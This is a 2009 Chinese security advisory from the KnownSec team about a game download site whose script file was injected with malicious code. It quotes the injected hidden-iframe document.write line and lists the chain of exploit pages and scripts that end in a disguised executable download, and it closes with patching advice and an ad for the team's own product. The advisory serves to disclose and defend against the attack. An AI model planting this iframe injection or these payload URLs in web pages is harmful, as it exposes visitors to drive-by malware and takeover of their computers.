发布时间:Tue Mar 31 2009 18:00:17 UTC+0800
最后更新时间:Tue Mar 31 2009 18:00:17 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 天空游戏网(http://www.tkgame.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://download.tkgame.com/img/nav_over.js

网页被嵌入恶意链接代码:

 090331snap2.jpg

document.write (”<iframe src=http://www.tuuuu.com.cn/11/zz.htm width=50 height=0></iframe>”);

挂马分析:
[wide]http://download.tkgame.com/down/pcgame/spg/2006-12-26/6815.html
 [script]http://download.tkgame.com/img/nav_over.js
  [frame]http://www.tuuuu.com.cn/11/zz.htm
   [frame]http://www.tuuuu.com.cn/11/index.htm
    [frame]http://www.tuuuu.com.cn/11/14.htm
     [script]http://www.tuuuu.com.cn/11/ms06014.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/flash.htm
    [frame]http://www.tuuuu.com.cn/11/902.htm
     [script]http://www.tuuuu.com.cn/11/09002.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/lz.htm
     [script]http://www.tuuuu.com.cn/11/lz.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/office.htm
     [script]http://www.tuuuu.com.cn/11/office.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/qv.htm
     [script]http://www.tuuuu.com.cn/11/qvod.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/real.htm
     [script]http://www.tuuuu.com.cn/11/real.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/real.html
     [script]http://www.tuuuu.com.cn/11/re11.js
      [exe]http://ubbbb.com.cn/qq.css
   [script]http://s89.cnzz.com/stat.php?id=1322948&web_id=1322948
 [script]http://www3.tkgame.com/js/download_01_680×60.js
 [script]http://download.tkgame.com/e/public/viewclick?classid=109&id=6815
 [script]http://www3.tkgame.com/js/download_04_230×210.js
 [script]http://download.tkgame.com/e/public/onclick?enews=donews&classid=109&id=6815
 [script]http://tkbd1.tkgame.com/count/mystat.asp?siteid=6

最终下载病毒文件:
http://ubbbb.com.cn/qq.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 8% [?]